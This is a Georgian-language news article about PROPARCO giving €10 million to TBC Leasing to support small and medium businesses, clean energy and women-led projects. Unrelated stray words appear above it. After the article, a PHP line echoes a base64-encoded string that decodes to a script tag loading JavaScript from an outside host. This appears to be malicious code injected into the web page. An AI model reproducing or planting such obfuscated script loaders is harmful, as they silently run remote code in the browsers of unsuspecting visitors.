celsiusi
ავერსი შნაიდერი

 საფრანგეთის განვითარების სააგენტო PROPARCO-მ საქართველოს უმსხვილეს სალიზინგო კომპანიას, "თიბისი ლიზინგს", 10 მილიონი ევროს მოცულობის ფინანსური რესურსი გამოუყო, რომელიც მდგრადი ეკონომიკური განვითარების ხელშეწყობის მიზნით მათი უკვე რიგით მეორე წარმატებული ტრანზაქციაა.

მოზიდული ფინანსური რესურსი კიდევ უფრო გააძლიერებს "თიბისი ლიზინგისა" და PROPARCO-ს პარტნიორობას და ხელს შეუწყობს ქართული მცირე და საშუალო ბიზნესის მხარდაჭერას.

თიბისი ლიზინგი აქტივების დაფინანსების გამარტივებისა და მომხმარებლებზე მორგებული პროდუქტების ფართო სპექტრის შეთავაზებით უზრუნველყოფს მცირე და საშუალო ბიზნესის მხარდაჭერას. აღნიშნულ რესურსს თიბისი ლიზინგი აქტივების პირდაპირ დასაფინანსებლად გამოიყენებს, რაც ქვეყნის განვითარებადი ეკონომიკისთვის მნიშვნელოვანი ხელშეწყობა იქნება.

მცირე და საშუალო ბიზნესი საქართველოს კორპორაციულ ლანდშაფტში დომინირებს და მთლიანი წარმოების ღირებულების 53%-ს და კერძო სექტორში ბრუნვის 35%-ს შეადგენს, რითაც მნიშვნელოვან როლს ასრულებს ქვეყნის ეკონომიკურ განვითარებაში.

ეს ტრანზაქცია ასევე მნიშვნელოვნად შეუწყობს ხელს კლიმატის ცვლილების წინააღმდეგ ბრძოლას და ქალთა ეკონომიკურ გაძლიერებას, რადგან მოზიდული ფინანსური რესურსის 40% სუფთა ენერგიისა და ენერგოეფექტურობის პროექტებზე იქნება მიმართული, ხოლო 10% იმ პროექტების მხარდასაჭერად, რომლებიც აძლიერებს ქალებს, როგორც მეწარმეებს, ბიზნეს ლიდერებს და ზრდის მათ ეკონომიკურ ჩართულობას.

„ჩვენ ვამაყობთ, რომ დავასრულეთ კიდევ ერთი წარმატებული ტრანზაქცია PROPARCO-სთან და კიდევ უფრო გავამყარეთ ჩვენი თანამშრომლობა. ეს ტრანზაქცია ასახავს ორივე ინსტიტუტის მზაობას, მხარი დაუჭირონ მცირე და საშუალო საწარმოებს საქართველოში ინოვაციური, მოქნილი და მორგებული ალტერნატიული დაფინანსების პროდუქტების მიწოდების გზით. ეს ჩვენი მეორე თანამშრომლობაა და მოუთმენლად ველით მომავალში კიდევ ბევრ წარმატებულ გარიგებაზე Propacro-სთან მუშაობას“, - ნუგზარ ლოლაძე, თიბისი ლიზინგის ფინანსური დირექტორი.

249
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");